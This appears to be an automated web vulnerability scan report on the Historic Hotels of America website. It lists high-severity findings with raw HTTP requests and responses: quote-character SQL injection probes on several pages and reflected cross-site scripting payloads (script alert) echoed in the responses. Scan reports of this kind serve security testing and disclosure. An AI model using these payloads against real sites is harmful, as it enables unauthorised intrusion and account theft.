HTTP/1.1 200 OK Connection: close Date: Thu, 21 Oct 2010 00:01:47 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Content-type: text/html <p style="font-family: Verdana, Geneva, Arial">Sorry, but you have encountered and error. <br /> <br />Please contact <b><i><a href="mailto:hha ...[SNIP]... |
GET /the_lenox_special_offer'' HTTP/1.1 Host: www.historichotels.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=15851695 |
HTTP/1.1 404 Not Found Connection: close Date: Thu, 21 Oct 2010 00:01:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Thu, 21 Oct 2010 00:01:53 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Historic Hotels of America</title> <META http-equiv=Content-Type ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.historichotels |
Path: | /vacations_leisure |
GET /vacations_leisure' HTTP/1.1 Host: www.historichotels.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=15851695 |
HTTP/1.1 200 OK Connection: close Date: Thu, 21 Oct 2010 00:03:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Content-type: text/html <p style="font-family: Verdana, Geneva, Arial">Sorry, but you have encountered and error. <br /> <br />Please contact <b><i><a href="mailto:hha ...[SNIP]... |
GET /vacations_leisure'' HTTP/1.1 Host: www.historichotels.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=15851695 |
HTTP/1.1 404 Not Found Connection: close Date: Thu, 21 Oct 2010 00:03:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Thu, 21 Oct 2010 00:03:57 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Historic Hotels of America</title> <META http-equiv=Content-Type ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.historichotels |
Path: | /woodlands_inn_1906 |
GET /woodlands_inn_1906' HTTP/1.1 Host: www.historichotels.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=15851695 |
HTTP/1.1 200 OK Connection: close Date: Thu, 21 Oct 2010 00:01:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Content-type: text/html <p style="font-family: Verdana, Geneva, Arial">Sorry, but you have encountered and error. <br /> <br />Please contact <b><i><a href="mailto:hha ...[SNIP]... |
GET /woodlands_inn_1906'' HTTP/1.1 Host: www.historichotels.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=15851695 |
HTTP/1.1 404 Not Found Connection: close Date: Thu, 21 Oct 2010 00:02:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Thu, 21 Oct 2010 00:02:02 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Historic Hotels of America</title> <META http-equiv=Content-Type ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.historichotels |
Path: | /wort_hospitality |
GET /wort_hospitality' HTTP/1.1 Host: www.historichotels.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=15851695 |
HTTP/1.1 200 OK Connection: close Date: Thu, 21 Oct 2010 00:01:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Content-type: text/html <p style="font-family: Verdana, Geneva, Arial">Sorry, but you have encountered and error. <br /> <br />Please contact <b><i><a href="mailto:hha ...[SNIP]... |
GET /wort_hospitality'' HTTP/1.1 Host: www.historichotels.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=15851695 |
HTTP/1.1 404 Not Found Connection: close Date: Thu, 21 Oct 2010 00:02:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Thu, 21 Oct 2010 00:02:00 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Historic Hotels of America</title> <META http-equiv=Content-Type ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.historichotels |
Path: | / |
GET /?e7ed0"><script>alert(1)< Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.historichotels.org Cookie: __utmc=15851695; __utma=15851695 |
HTTP/1.1 200 OK Connection: close Date: Thu, 21 Oct 2010 00:04:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Thu, 21 Oct 2010 00:04:02 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Historic Hotels of America</title> <META http-equiv=Content-Type ...[SNIP]... <a href="/index.php?e7ed0"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.historichotels |
Path: | /SpecialsPackages |
GET /SpecialsPackages?7f98a"> Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.historichotels.org Cookie: __utmc=15851695; __utma=15851695 |
HTTP/1.1 200 OK Connection: close Date: Wed, 20 Oct 2010 23:54:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Wed, 20 Oct 2010 23:54:34 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Specials & Packages, Historic Hotels of America</title> <META ht ...[SNIP]... </script>4d036e11c5f=186f2b<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.historichotels |
Path: | /SpecialsPackages |
GET /SpecialsPackages?7f98a"><script>alert(1)< Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://www.historichotels Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E) Accept-Encoding: gzip, deflate Host: www.historichotels.org Proxy-Connection: Keep-Alive Cookie: __utmc=15851695; __utma=15851695 |
HTTP/1.1 200 OK Connection: close Date: Wed, 20 Oct 2010 23:47:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Wed, 20 Oct 2010 23:47:12 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Specials & Packages, Historic Hotels of America</title> <META ht ...[SNIP]... <a href="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.historichotels |
Path: | /fckeditor/editor/images2 |
GET /fckeditor/editor/images2 Accept: */* Referer: http://www.historichotels Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E) Accept-Encoding: gzip, deflate Host: www.historichotels.org Proxy-Connection: Keep-Alive Cookie: __utmc=15851695; __utma=15851695 |
HTTP/1.1 404 Not Found Connection: close Date: Thu, 21 Oct 2010 00:04:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Thu, 21 Oct 2010 00:04:35 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Historic Hotels of America</title> <META http-equiv=Content-Type ...[SNIP]... <a href="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.historichotels |
Path: | /index.php |
GET /index.php?layout=printc35c9"><script>alert(1)< Host: www.historichotels.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=15851695 |
HTTP/1.1 200 OK Connection: close Date: Wed, 20 Oct 2010 23:41:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Wed, 20 Oct 2010 23:41:53 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Historic Hotels of America</title> <META http-equiv=Content-Type ...[SNIP]... <a href="/index.php?layout ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.historichotels |
Path: | /index.php |
GET /index.php?a625a"><script>alert(1)< Host: www.historichotels.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=15851695 |
HTTP/1.1 200 OK Connection: close Date: Wed, 20 Oct 2010 23:53:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Wed, 20 Oct 2010 23:53:13 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Historic Hotels of America</title> <META http-equiv=Content-Type ...[SNIP]... <a href="/index.php?a625a"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.historichotels |
Path: | /shop |
GET /shop?b6504"><script>alert(1)< Host: www.historichotels.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=15851695 |
HTTP/1.1 200 OK Connection: close Date: Wed, 20 Oct 2010 23:55:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Wed, 20 Oct 2010 23:55:13 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Shop HHA, Historic Hotels of America</title> <META http-equiv=Co ...[SNIP]... <a href="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.historichotels |
Path: | /spas_retreats |
GET /spas_retreats?3f806"><script>alert(1)< Host: www.historichotels.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=15851695 |
HTTP/1.1 200 OK Connection: close Date: Wed, 20 Oct 2010 23:59:18 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Wed, 20 Oct 2010 23:59:18 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Historic Hotels of America</title> <META http-equiv=Content-Type ...[SNIP]... <a href="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.historichotels |
Path: | /step_back_in_time |
GET /step_back_in_time?e7acd"><script>alert(1)< Host: www.historichotels.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=15851695 |
HTTP/1.1 200 OK Connection: close Date: Wed, 20 Oct 2010 23:55:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Wed, 20 Oct 2010 23:55:42 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Step Back in Time at The Grove Park Inn, Historic Hotels of Ameri ...[SNIP]... <a href="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.historichotels |
Path: | /taste_of_napa |
GET /taste_of_napa?7f987"><script>alert(1)< Host: www.historichotels.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=15851695 |
HTTP/1.1 200 OK Connection: close Date: Wed, 20 Oct 2010 23:55:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Wed, 20 Oct 2010 23:55:25 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>A Taste of Napa Valley History, Historic Hotels of America</title ...[SNIP]... <a href="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.historichotels |
Path: | /the_heathman_hotel_offer |
GET /the_heathman_hotel_offer Host: www.historichotels.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=15851695 |
HTTP/1.1 200 OK Connection: close Date: Wed, 20 Oct 2010 23:56:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Wed, 20 Oct 2010 23:56:01 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Art and History Collide at The Heathman Hotel, Historic Hotels of ...[SNIP]... <a href="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.historichotels |
Path: | /the_lenox_special_offer |
GET /the_lenox_special_offer?2b40d"><script>alert(1)< Host: www.historichotels.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=15851695 |
HTTP/1.1 200 OK Connection: close Date: Wed, 20 Oct 2010 23:55:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Wed, 20 Oct 2010 23:55:58 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>(Time) Travel to Historic Boston at The Lenox, Historic Hotels of ...[SNIP]... <a href="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.historichotels |
Path: | /vacations_leisure |
GET /vacations_leisure?869a9"><script>alert(1)< Host: www.historichotels.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=15851695 |
HTTP/1.1 200 OK Connection: close Date: Wed, 20 Oct 2010 23:58:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Wed, 20 Oct 2010 23:58:45 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Historic Hotels of America</title> <META http-equiv=Content-Type ...[SNIP]... <a href="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.historichotels |
Path: | /woodlands_inn_1906 |
GET /woodlands_inn_1906?cb76e"><script>alert(1)< Host: www.historichotels.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=15851695 |
HTTP/1.1 200 OK Connection: close Date: Wed, 20 Oct 2010 23:56:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Wed, 20 Oct 2010 23:56:03 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Southern Hospitality at Its Finest, Historic Hotels of America</t ...[SNIP]... <a href="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.historichotels |
Path: | /wort_hospitality |
GET /wort_hospitality?51881"><script>alert(1)< Host: www.historichotels.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=15851695 |
HTTP/1.1 200 OK Connection: close Date: Wed, 20 Oct 2010 23:56:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Wed, 20 Oct 2010 23:56:06 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Experience Traditional Western Hospitality, Historic Hotels of Am ...[SNIP]... <a href="http://www ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | http://www.historichotels |
Path: | / |
GET / HTTP/1.1 Accept: */* Referer: http://www.summithotels Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E) Accept-Encoding: gzip, deflate Host: www.historichotels.org Proxy-Connection: Keep-Alive Cookie: __utma=15851695 |
HTTP/1.1 200 OK Connection: close Date: Wed, 20 Oct 2010 23:39:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Set-Cookie: PHPSESSID=e9406215f1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Wed, 20 Oct 2010 23:39:16 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Historic Hotels of America</title> <META http-equiv=Content-Type ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.historichotels |
Path: | /SpecialsPackages |
GET /SpecialsPackages?7f98a"> Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.historichotels.org Cookie: __utmc=15851695; __utma=15851695 |
HTTP/1.1 200 OK Connection: close Date: Wed, 20 Oct 2010 23:52:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Wed, 20 Oct 2010 23:52:15 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Specials & Packages, Historic Hotels of America</title> <META ht ...[SNIP]... </script> <script src="http://www.google ...[SNIP]... <div align="center" style="font-size: 11px;"> <a style="color: #000000;" href="https://indecorp | <a style="color: #000000;" href="https://indecorp | <a style="color: #000000;" href="https://indecorp ...[SNIP]... <p><a href="http://www ...[SNIP]... <div align="center" style="margin: 5px;"> Historic Hotels of America, a <A class=footerlink href="http://www ...[SNIP]... <BR>is a program of the <A class=footerlink href="http://www Trust for Historic Preservation</A> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.historichotels |
Path: | /index.php |
GET /index.php?layout Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.historichotels.org Cookie: __utmc=15851695; __utma=15851695 |
HTTP/1.1 200 OK Connection: close Date: Wed, 20 Oct 2010 23:50:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Wed, 20 Oct 2010 23:50:06 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Historic Hotels of America</title> <META http-equiv=Content-Type ...[SNIP]... </script> <script src="http://www.google ...[SNIP]... <div align="center" style="font-size: 11px;"> <a style="color: #000000;" href="https://indecorp | <a style="color: #000000;" href="https://indecorp | <a style="color: #000000;" href="https://indecorp ...[SNIP]... <p><a href="http://www ...[SNIP]... <p align="left">If you are interested in becoming a member of the National Trust for Historic Preservation, please <a href="https://secure2 ...[SNIP]... <div align="center"><a href="http://www ...[SNIP]... <div style="margin-top: 5px;"><a href="http://www ...[SNIP]... </div> Follow Historic Hotels of America on <a target="_blank" href="http://www.facebook ...[SNIP]... <div align="center" style="margin: 5px;"> Historic Hotels of America, a <A class=footerlink href="http://www ...[SNIP]... <BR>is a program of the <A class=footerlink href="http://www Trust for Historic Preservation</A> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.historichotels |
Path: | / |
GET / HTTP/1.1 Accept: */* Referer: http://www.summithotels Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E) Accept-Encoding: gzip, deflate Host: www.historichotels.org Proxy-Connection: Keep-Alive Cookie: __utma=15851695 |
HTTP/1.1 200 OK Connection: close Date: Wed, 20 Oct 2010 23:39:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Set-Cookie: PHPSESSID=e9406215f1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Wed, 20 Oct 2010 23:39:16 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Historic Hotels of America</title> <META http-equiv=Content-Type ...[SNIP]... </script> <script src="http://www.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.historichotels |
Path: | /SpecialsPackages |
GET /SpecialsPackages HTTP/1.1 Accept: */* Referer: http://www.historichotels Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E) Accept-Encoding: gzip, deflate Host: www.historichotels.org Proxy-Connection: Keep-Alive Cookie: __utma=15851695 |
HTTP/1.1 200 OK Connection: close Date: Wed, 20 Oct 2010 23:39:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Wed, 20 Oct 2010 23:39:23 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Specials & Packages, Historic Hotels of America</title> <META ht ...[SNIP]... </script> <script src="http://www.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.historichotels |
Path: | /favicon.ico |
GET /favicon.ico HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E) Host: www.historichotels.org Proxy-Connection: Keep-Alive Cookie: __utma=15851695 |
HTTP/1.1 404 Not Found Connection: close Date: Wed, 20 Oct 2010 23:39:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Wed, 20 Oct 2010 23:39:21 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Historic Hotels of America</title> <META http-equiv=Content-Type ...[SNIP]... </script> <script src="http://www.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.historichotels |
Path: | /fckeditor/editor/images2 |
GET /fckeditor/editor/images2 Accept: */* Referer: http://www.historichotels Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E) Accept-Encoding: gzip, deflate Host: www.historichotels.org Proxy-Connection: Keep-Alive Cookie: __utma=15851695 |
